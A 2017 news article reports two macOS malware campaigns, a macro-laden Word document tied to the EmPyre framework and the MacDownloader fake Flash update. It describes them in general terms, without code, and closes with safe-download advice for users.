Word Macros and fake Flash updates now target Mac users

Feb 9, 2017 13:47 GMT  ·  By

Just because Macs aren’t victims of malware that often, it doesn’t mean it doesn’t happen, as this new Mac malware detected earlier this week proves.

Mac security researchers have detected two separate instances of MacOS malware this week. One of the exploits relies on an old Windows technique. In short, a malicious Microsoft Word abusing macros, titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace,” was sent.

When Mac users opened the document in a Word application configured to allow macros and ignore warnings, the embedded macro automatically checked that the LittleSnitch security firewall wasn’t running, notes Patrick Wardle, director of security firm Synack. 

It then downloaded an encrypted payload, decrypted it using a hard-coded key and executed the payload. It seems that the code in the macro was taken from an open-source exploit framework for Macs named EmPyre. By the time the document was tracked by specialists, the site the payload was downloaded from was no longer serving it, so it’s impossible to tell exactly what it was doing.

Given the fact that the code was so similar to EmPyre, the malware could very well monitor webcams, steal password and encryption keys, and access browser history logs.

While this type of attack is nowadays considered primitive, especially given the fact that Office itself advises against allowing macros to run with a clear warning about potential viruses, some Mac users were still affected.

The fake Flash Player update

The other malware instance discovered this week also relied on classic Windows tactics by faking a regular software update dialog that downloads malicious code rather than the app’s needed update. The MacDownloader virus presented itself as an Adobe Flash Player update, which everyone knows are annoying. This is what attackers were counting on, of course, as people either dismiss the updates or just press yes to get them dismissed once and for all.

In reality, users gave the green light for the malware to harvest user keychain, phish usernames and passwords, or collect private, sensitive data. It all got sent back to the attacker. While this attack is a bit more sophisticated than the first one, it’s still primitive compared to what Windows users confront.

It pretty much relied on people clicking on a link to update Flash Player from a website and running the downloaded file. It’s been said a million times over, and it looks like it needs to be said a million times more – if you’re going to download any software, or software update for that matter, always go directly to the producer’s site. The same goes for following links where you’re then asked for username and password - type in the URL yourself rather than relying on an email you received, or you might fall victim to a phishing attack.